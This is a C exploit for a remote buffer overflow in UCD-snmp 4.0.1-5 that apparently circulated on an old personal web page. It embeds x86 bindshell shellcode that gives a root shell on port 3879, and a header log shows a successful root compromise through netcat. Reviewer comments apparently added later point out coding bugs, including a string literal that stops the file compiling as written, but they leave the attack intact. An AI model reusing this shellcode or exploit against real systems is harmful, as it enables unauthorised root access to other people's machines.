/*
**
** UCD-snmp-4.0.1-5 Remote Buffer Overflow exploit
**
** === Testing: =============================================================
** 
** [x82@xpl017elz x82]$ id
** uid=501(x82) gid=501(x82) groups=501(x82)
** [x82@xpl017elz x82]$ ./snmpxpl -h 61.xx.177.32
**
**  UCD-snmp-4.0.1-5 Remote Buffer Overflow exploit
** 
**                        Exploit made by Xpl017Elz
** 
**  Shellcode Address: 0xbfffd710
**  Host: 61.xx.177.32
**  [&shellcode: 112byte] [NOP + shellcode: 144byte] [0x00] - total 257byte
**  Open Port: 3879 (Default)
** 
** Timeout: No Response from 61.xx.177.32
** [x82@xpl017elz x82]$ nc 61.xx.177.32 3879
** whoami;
** root
** pwd;
** /home/x82
** id;
** uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),
** 6(disk),10(wheel),503(secure)               
**
** =========================================================================
**
** exploit by "you dong-hun" (Xpl017Elz).
** My World: http://x82.i21c.net
**
*/

#include 

#define DEFAULT       0
#define VALUES        112
#define HOST          "127.0.0.1"
#define DEFAULT_CODE  0xbfffd710 /* RedHat Linux 6.x ucd-snmp-4.0.1-5 */
#define SNMPWALK      "/usr/bin/snmpwalk"            /* snmpwalk PATH */

main(int argc, char *argv[]) {
/*
 * Entry point. Fills xOx with an address block, '@' padding and the
 * payload bytes according to -s/-v, prints a summary, then replaces this
 * process with snmpwalk, handing the buffer over as its second positional
 * argument.
 *
 * Reviewer notes (code deliberately left byte-for-byte as found):
 *  - implicit int return type and no return statement; banrl() and
 *    usages() are called before any prototype is visible (implicit
 *    declaration, not valid C99+).
 *  - the string literal of the third printf below spans a line break, so
 *    the function is not valid C as written.
 *  - no option value is range-checked; see the notes at strcpy() and at
 *    the -v handling below.
 */

char shellcode[] = /* Linux(x86) bindshell on port 3879 */
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";

    /*
     * xOx: the argument being assembled (256 bytes + terminator).
     * connect[]: never used.
     * host[] and snmpwalk[] are sized by their initializer literals, i.e.
     * host[] holds exactly sizeof(HOST) bytes (10 for "127.0.0.1").
     */
    char       xOx[257],
           connect[100],
          host[] = HOST,
  snmpwalk[] = SNMPWALK; 
    /* count is the write cursor into xOx; it is never compared against
     * sizeof xOx anywhere below. values is the byte count of the address
     * block (-v). */
    int count = DEFAULT,
        num_1 = DEFAULT,
        num_2 = DEFAULT,
        num_3 = DEFAULT,
        jobst = DEFAULT,
        values = VALUES;

    unsigned long shelladdr = DEFAULT_CODE;
    extern char *optarg;

    /* Zero-fill so the byte following a full 256-byte fill is the NUL
     * terminator. bzero() is legacy BSD; memset() is the standard form. */
    bzero(xOx, 257);
    banrl();

    /* getopt() reports end-of-options with -1; EOF merely happens to be -1
     * on common libcs, so the documented sentinel is -1. */
    while ((jobst = getopt(argc, argv, "h:s:v:")) !=EOF)
    switch (jobst) {

    /* Unbounded copy into the sizeof(HOST)-byte host[] array: any -h
     * argument longer than the HOST literal overruns it. */
    case 'h': strcpy(host, optarg);                 break;
    /* base 0: accepts "0x..." hex as in the usage example. Not checked
     * for trailing garbage or ERANGE. */
    case 's': shelladdr = strtoul(optarg, NULL, 0); break;
    /* atoi() reports no errors; negative or oversized values pass through. */
    case 'v': values = atoi(optarg);                break;
    case '?': usages(argv[0]);                    exit(0); 
    }

    /* Address block: values/4 copies of shelladdr, least-significant byte
     * first. Runs before the size check below, so an oversized -v has
     * already written past xOx by the time that check fires. */
    for(num_1 = 0; num_1 <  (values / 4); num_1++) {
    xOx[count++] = (shelladdr >>  0) & 0xff;
    xOx[count++] = (shelladdr >>  8) & 0xff;
    xOx[count++] = (shelladdr >> 16) & 0xff;
    xOx[count++] = (shelladdr >> 24) & 0xff;
    }
    /* Rejects values > 0x100 - 0x82 = 126 so that the remaining space
     * exceeds the payload length and the subtraction in the padding loop
     * stays non-negative. There is no corresponding lower bound. */
    if((0x100 - values) < 0x00000082) { 
    printf("\n - Values error. :-(\n\n");
    printf(" Space that shellcode comes is so narrow.\n");
    printf(" Compose exploit again.\n\n");
    exit(0);
    }
    /* Padding: fill up to 256 bytes total with '@'. strlen() returns
     * size_t, so the whole bound is evaluated unsigned; a negative -v
     * therefore yields a large pad count here rather than an error. */
    for(num_2 = 0; num_2 < (0x100 - values) - strlen(shellcode); num_2++) {
    xOx[count++] = '@';
    }
    /* Payload bytes last. With values a multiple of 4 the three runs total
     * exactly 256 bytes and xOx[256] stays NUL from bzero(). */
    for(num_3 = 0; num_3 < strlen(shellcode); num_3++) {
    xOx[count++] = shellcode[num_3];
    }

 /* %p expects a void *; shelladdr is an unsigned long, so this format /
  * argument pair is mismatched (undefined behaviour per the standard;
  * %#lx would match). */
 printf(" Shellcode Address: %p\n", shelladdr);
 printf(" Host: %s\n", host);
 /* NOTE(review): this literal contains a raw line break and does not
  * compile as written. */
 printf(" [&shellcode: %dbyte] [NOP + shellcode: %dbyte] [0x00] - total 257byte
 ",values,256-values);
 printf("Open Port: 3879 (Default)\n\n");

    /* execl() only returns on failure and its result is not checked, so a
     * missing or non-executable SNMPWALK path silently falls off the end
     * of main. */
    execl(snmpwalk, "snmpwalk", host, xOx, NULL);

}

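/*
 * Print the program banner to stdout.
 *
 * Declared with an explicit return type and an empty parameter list
 * (the original relied on implicit int and an unprototyped definition,
 * both removed from the language after C89). Returns 0; callers ignore
 * the value.
 */
int banrl(void) {

    /* The strings carry no conversions, so fputs() emits them unchanged. */
    fputs("\n UCD-snmp-4.0.1-5 Remote Buffer Overflow exploit\n\n", stdout);
    fputs("\t\t       Exploit made by Xpl017Elz\n\n", stdout);
    return 0;

}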

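/*
 * Print the command-line usage text to stdout.
 *
 * @param var  program name to show in the Usage and example lines
 *             (argv[0] at the call site); must be a valid C string.
 * @return     0; callers ignore the value.
 *
 * Explicit return type and const-qualified parameter replace the
 * original implicit-int definition; the output bytes are unchanged.
 */
int usages(const char *var) {

    printf("\n Usage: %s -h [hostname] -s [address] -v [value]\n", var);
    fputs("\n option: -h - IP address & Domain name", stdout);
    fputs("\n         -s - Shellcode Address", stdout);
    fputs("\n         -v - &Shellcode Size\n\n", stdout);
    printf("\n example: %s -h 127.0.0.1 -s 0xbfffd710 -v 112\n\n", var);
    return 0;

}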

    Source: geocities.com/f173s